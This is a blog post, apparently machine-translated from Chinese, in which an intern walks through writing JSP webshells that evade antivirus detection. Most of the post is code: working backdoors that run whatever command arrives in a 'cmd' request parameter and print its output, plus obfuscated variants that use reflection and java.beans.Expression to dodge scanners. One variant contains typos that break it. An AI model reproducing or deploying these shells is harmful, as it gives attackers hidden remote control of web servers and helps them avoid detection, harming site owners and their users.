JSP webshell free -- webshell free

It's funny , The people around me mentioned a lot every day during the provincial care , It is said that he is a very powerful boss .

As a result, the video I learned without killing is the big guy's .

Even more outrageous , Brother Cong said that we have met a lot , The last time I sorted out the report for the red team , He's right there .

Sure enough , Internship is good , The legendary bigwigs are around —— Although I don't know , But I still feel good .

Come on , Start learning to avoid killing

First , What is? webshell?

webshell That is to say asp、php、jsp perhaps cgi A code execution environment in the form of web page files , Mainly used for website management 、 Server management 、 Permission management and other operations . Easy to use , Just upload a code file , Visit through website , Many daily operations can be carried out , It greatly facilitates users' management of websites and servers .

What is? RCE？

RCE English full name ：remote command/code execute
Divided into remote command execution ping And remote code execution evel.
The reason for the vulnerability ： There is no input processing at the input port .

First do the basic reflection

The first is the simplest sentence, Trojan horse ：

<%@ page language="java" pageEncoding="UTF-8" %>

<%

    Runtime.getRuntime().exec(request.getParameter("cmd"));

%>

  It's too easy to find

And when I wrote the code, the computer virus and threat protection had already begun to react

Now put this sentence on the horse , Write separately

<%@ page language="java" pageEncoding="UTF-8" %>

<%

    String cmd =request.getParameter("cmd");

    Runtime.getRuntime().exec(cmd);

%>

  The sandbox passed

however cmd=ipconfig Nothing comes out ,netstat -ano It's also .

  Change the code again

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

    String cmd =request.getParameter("cmd");

    Process process = Runtime.getRuntime().exec(cmd);

    InputStream in = process.getInputStream();

    InputStreamReader reader = new InputStreamReader(in);

    BufferedReader input = new BufferedReader(reader);

    String s = null;

    response.getWriter().print("<pre>");

    while ((s = input.readLine())!=null){

        response.getWriter().println(s);

    }

    response.getWriter().print("</pre>");

%>

There's an episode in the middle ,

  I can't see why the code reports an error , It turned out that it was because getWrite A less r.

But this is only done and can be echoed , There is no reflection function

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page import="java.lang.reflect.Method" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

    String cmd =request.getParameter("cmd");

    Class<?> rt = Class.forName("java.lang.getRuntime");

    Methond grMethod = rt.getMethod("getRuntime");

    Methond method = rt.getMethod("exec",String.class);

    Object object = method.invoke(grMethod.invoke(null),cmd);

    Process process = (Process)object;

    InputStream in = process.getInputStream();

    InputStreamReader reader = new InputStreamReader(in);

    BufferedReader input = new BufferedReader(reader);

    String s = null;

    response.getWriter().print("<pre>");

    while ((s = input.readLine())!=null){

        response.getWriter().println(s);

    }

    response.getWriter().print("</pre>");

%>

BeansExpression No killing

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page import="java.beans.Expression" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

    String cmd =request.getParameter("cmd");

    Expression expr = new Expression(Runtime.getRuntime(),"exec",new Object[]{cmd});

    Process process = (Process) expr.getValue();

    InputStream in = process.getInputStream();

    StringBuilder sb = new StringBuilder();

    response.getWriter().print("<pre>");

    InputStreamReader resultReader = new InputStreamReader(in);

    BufferedReader stdInput = new BufferedReader(resultReader);

    String s = null;

    while ((s = stdInput.readLine())!=null){

        sb.append(s).append("\n");

    }

    response.getWriter().print(sb.toString());

    response.getWriter().print("</pre>");

%>